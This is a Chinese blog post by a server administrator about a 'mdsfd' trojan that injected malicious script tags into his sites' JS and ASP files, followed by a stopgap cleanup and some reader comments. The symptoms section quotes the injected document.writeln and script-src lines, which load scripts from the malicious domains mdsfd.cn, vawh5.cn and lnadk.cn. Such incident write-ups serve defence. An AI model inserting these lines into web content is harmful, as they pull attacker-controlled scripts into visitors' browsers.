mdsfd木马临时解决方案

服务器1月份就中马了,项目太紧,人太懒,又无关紧要,就一直没搭理它。小昭的BLOG纠结中,龚浩的BLOG纠结中……唉,没办法,小昭可乐都给我买了,不得不出山了。服务器上网站太多,不知是哪有漏洞,索性弄了一招治标不治本的,暂时顶着先。

症状:

网页被挂马,多了一句<script src=http://mdsfd.cn></script>,挂的恶意网站有如下等等:www.51jcjy.com www.rr88rr.cn,所有的JS文件均被添加了

document.writeln ("<script src=\"http://mdsfd.cn\"><\/script>");
document.writeln ("<script src=\"http://vawh5.cn\"><\/script>");
document.writeln ("<script src=\"http://lnadk.cn\"><\/script>");

个别ASP文件被添加上了

<script src=http://mdsfd.cn></script>

删除之后过一段时间文件又被修改。排除ARP病毒,IIS配置文件被改的可能性,具体步骤不做讲解。查找木马的根源,无奈服务器上网站太多,没法子下手。遂先解决当前问题……

现在采用了以下方案:

  1. 首先下载 文本替换专家 2.6,将恶意代码全部清除。
  2. 登录www.websafeguard.cn 下载 网站安全卫士-服务器版
  3. 配置一下就OK了。详细的设置查帮助文档

后话

还有一哥们提供了方案,买他们的mdcsoft-ips软件,貌似可以从根源上防止问题。只不过这网站的名字 Mdcsoft(中国)研究院,Mdcsoft(中国)研发集团,够山寨

5 responses on “mdsfd木马临时解决方案

  1. 其实对“mdsfd木马”不感兴趣,倒是感觉山寨microsoft挺有意思,不过mdcsoft的网站风格还要改进一下。如果要做下一个山寨网站,百度的比较好做,因为页面确实简洁,弄个“千度”点击搜索转到www.dreamfly.org. 🙂

  2. talent

    你娃终于冒泡了,呵呵

    1. 冒个泡泡先 HOHO 你也好久没冒了嘛

  3. 军军

    mdcsoft-ips那个软件也非常牛,我单位也买了,两个服务器上都装了,算是再没被攻击了。

  4. 看来我也得去买个了~

Comments are closed.